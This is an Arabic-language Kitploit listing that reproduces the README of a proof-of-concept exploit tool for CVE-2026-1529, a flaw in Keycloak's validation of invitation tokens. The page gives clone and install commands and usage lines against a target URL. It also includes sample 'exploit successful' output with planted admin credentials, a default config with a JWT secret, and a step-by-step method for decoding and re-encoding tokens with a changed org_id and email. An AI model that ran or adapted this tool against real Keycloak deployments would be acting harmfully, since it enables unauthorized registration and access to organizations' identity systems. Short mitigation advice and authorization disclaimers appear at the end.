Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation — CVE-2026-1529 (PoC) هي ثغرة أمنية حرجة في Keycloak تسمح بتسجيل مؤسسات غير مصرح بها من خلال التحقق غير السليم من رموز الدعوة. توضح أداة الاستغلال هذه الثغرة عبر التلاعب برموز JWT لتسجيل المستخدمين في مؤسسات غير مصرح بها. | Kitploit
أدوات/GitHubGitHub/ninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529 (PoC) هي ثغرة أمنية حرجة في Keycloak تسمح بتسجيل مؤسسات غير مصرح بها من خلال التحقق غير السليم من رموز الدعوة. توضح أداة الاستغلال هذه الثغرة عبر التلاعب برموز JWT لتسجيل المستخدمين في مؤسسات غير مصرح بها.

عرض المستودع
11منذ 7 أشهرلم تتم المراجعة بعد

أداة استغلال ثغرة CVE-2026-1529 في Keycloak

Keycloak: تسجيل مؤسسة غير مصرح به عبر التحقق غير السليم من رمز الدعوة


إخلاء مسؤولية

هذه الأداة لأغراض تعليمية واختبار الأمان فقط. استخدمها فقط على الأنظمة التي لديك إذن صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي. مؤلفو هذه الأداة غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

أنشأها: f3ds cr3w est, 2002


نظرة عامة

CVE-2026-1529 هي ثغرة حرجة في Keycloak تسمح بتسجيل مؤسسات غير مصرح بها من خلال التحقق غير السليم من رمز الدعوة. توضح هذه الأداة الاستغلالية الثغرة من خلال التلاعب برموز JWT لتسجيل المستخدمين في مؤسسات غير مصرح بها.

التفاصيل الفنية

  • معرف CVE: CVE-2026-1529
  • البرنامج المتأثر: Keycloak (org.keycloak.services.resources.organizations)
  • درجة CVSS: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • متجه الهجوم: شبكة
  • تعقيد الهجوم: منخفض
  • التأثير: وصول غير مصرح به إلى موارد المؤسسة

وصف الثغرة

توجد الثغرة في عملية التحقق من رمز JWT لدعوات المؤسسات. يمكن للمهاجمين التلاعب بحقلي org_id و email في حمولة JWT، مما يسمح لهم بتسجيل المستخدمين في أي مؤسسة دون تفويض صحيح.


التثبيت

المتطلبات الأساسية

  • بايثون 3.7 أو أحدث
  • مدير حزم pip

الإعداد

  1. استنسخ أو حمّل الأداة الاستغلالية:
root@kitploit:~
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. ثبّت التبعيات المطلوبة:
root@kitploit:~
pip install -r requirements.txt
  1. اجعل السكربت الاستغلالي قابلاً للتنفيذ:
root@kitploit:~
chmod +x keycloak-exploit.py

الاستخدام

الاستخدام الأساسي

root@kitploit:~
# Standard usage with target URL
python keycloak-exploit.py https://target-keycloak.com

# Show help
python keycloak-exploit.py -h

# Show version
python keycloak-exploit.py -v

الاستخدام المتقدم

root@kitploit:~
# Use custom invitation token
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Use custom organization ID
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Use custom configuration file
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Enable debug logging
python keycloak-exploit.py -d https://target-keycloak.com

خيارات سطر الأوامر


المخرجات

استغلال ناجح

عند نجاح الاستغلال، سترى مخرجات مثل:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

استغلال فاشل

إذا فشل الاستغلال، سترى:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

هيكل المشروع

root@kitploit:~
CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

الإعدادات

الإعداد الافتراضي

تستخدم الأداة ملف إعدادات افتراضي (config/default_config.json) بالإعدادات التالية:

root@kitploit:~
{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

إعداد مخصص

يمكنك إنشاء ملف إعدادات مخصص واستخدامه مع الخيار -c:

root@kitploit:~
{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

التفاصيل الفنية

عملية الاستغلال

  1. تحليل الهدف: التحقق مما إذا كان الهدف مثيل Keycloak قابلًا للاستغلال
  2. توليد الرمز: توليد أو استخدام رمز دعوة مخصص
  3. التلاعب بالرمز: التلاعب بحمولة JWT لتغيير معرف المؤسسة
  4. تسجيل المستخدم: تسجيل مستخدم باستخدام الرمز المتلاعب به
  5. اختبار تسجيل الدخول: التحقق من قدرة المستخدم المنشأ على تسجيل الدخول
  6. توليد التقرير: إنشاء تقرير استغلال مفصل

التلاعب بـ JWT

تستغل الأداة التحقق غير السليم من JWT من خلال:

  1. فك ترميز رمز JWT دون التحقق من التوقيع
  2. تعديل حقل org_id لاستهداف مؤسسة مختلفة
  3. تعديل حقل email إذا لزم الأمر
  4. إعادة ترميز الرمز بالحمولة المتلاعب بها

اعتبارات الأمان

  • تستخدم الأداة معالجة أخطاء وتسجيلًا مناسبين
  • تتضمن جميع طلبات الشبكة ترويسات مناسبة
  • يتم تنفيذ التحقق من صحة الإدخال على جميع مدخلات المستخدم
  • تحترم الأداة رموز استجابة الخادم المستهدف

استكشاف الأخطاء وإصلاحها

المشكلات الشائعة

  1. أخطاء الاتصال

    • تحقق مما إذا كان عنوان الهدف قابلًا للوصول
    • تحقق من أن الهدف هو مثيل Keycloak
    • تحقق من اتصال الشبكة وإعدادات جدار الحماية
  2. أخطاء التحقق من الرمز

    • تأكد من صحة تنسيق الرمز
    • تحقق مما إذا كان الرمز يحتوي على الحقول المطلوبة (org_id, email, invitation_type)
    • تحقق من عدم انتهاء صلاحية الرمز
  3. فشل التسجيل

    • تحقق من إمكانية الوصول إلى نقطة نهاية التسجيل
    • تحقق من تنسيق الرمز المتلاعب به
    • تحقق مما إذا كان الهدف قد فعّل تسجيل المؤسسات

وضع التصحيح

فعّل تسجيل التصحيح لاستكشاف الأخطاء بالتفصيل:

root@kitploit:~
python keycloak-exploit.py -d https://target-keycloak.com

ملفات السجل

  • السجل الرئيسي: logs/exploit.log
  • التقارير: output/reports/exploit_report_YYYYMMDD_HHMMSS.txt

منهجية الاختبار

تقييم الثغرة

تنفذ الأداة الفحوصات التالية:

  1. فحص الصحة: يتحقق من أن الهدف هو مثيل Keycloak
  2. اكتشاف الإصدار: يحاول اكتشاف إصدار Keycloak
  3. اختبار نقطة النهاية: يختبر نقاط النهاية المتعلقة بالمؤسسات
  4. التحقق من الرمز: يتحقق من بنية رمز JWT

التحقق من الاستغلال

يُعتبر الاستغلال ناجحًا إذا:

  1. كان الهدف قابلًا للاستغلال
  2. يمكن تسجيل مستخدم باستخدام الرمز المتلاعب به
  3. يمكن للمستخدم المسجل تسجيل الدخول بنجاح
  4. يتم توليد رابط تسجيل دخول صالح

أفضل ممارسات الأمان

للمؤسسات

  1. تطبيق التصحيحات: قم بالتحديث إلى أحدث إصدار من Keycloak
  2. التحقق من الرمز: قم بتطبيق التحقق السليم من توقيع JWT
  3. التحكم في الوصول: قيّد تسجيل المؤسسات على المستخدمين المصرح لهم
  4. المراقبة: راقب أنشطة التسجيل المشبوهة
  5. أمان الشبكة: نفّذ قواعد جدار حماية مناسبة

لباحثي الأمان

  1. التفويض: اختبر فقط الأنظمة التي لديك إذن لاختبارها
  2. الإفصاح المسؤول: أبلغ البائعين بالثغرات
  3. التوثيق: احتفظ بسجلات مفصلة لاختباراتك
  4. الاختبار الأخلاقي: اتبع ممارسات الإفصاح المسؤول

الترخيص

تُقدَّم هذه الأداة لأغراض تعليمية واختبار الأمان فقط. استخدمها على مسؤوليتك الخاصة.

أنشأها: f3ds cr3w est, 2002

التواصل: للأسئلة أو الملاحظات، يرجى الرجوع إلى مستودع المشروع.


سجل التغييرات

الإصدار 1.0

  • الإصدار الأولي
  • وظيفة استغلال أساسية
  • قدرات التلاعب بـ JWT
  • توليد التقارير
  • واجهة سطر أوامر

🙏 شكر وتقدير

  • فريق تطوير Keycloak
  • باحثو الأمان الذين اكتشفوا CVE-2026-1529
  • مجتمع أمان المصادر المفتوحة

تذكر: القوة العظيمة تأتي بمسؤولية عظيمة. استخدم هذه الأداة بحكمة وأخلاق.

بواسطة f3ds cr3w est, 2002

تنزيل الأداة
الخيارالوصفمطلوب
targetعنوان Keycloak المستهدف (IP أو نطاق)نعم
-t, --tokenرمز دعوة مخصص للاستخداملا
-o, --org-idمعرف مؤسسة مخصصلا
-c, --configمسار ملف الإعداداتلا
-d, --debugتفعيل تسجيل التصحيحلا
-v, --versionعرض معلومات الإصدارلا
-h, --helpعرض رسالة المساعدةلا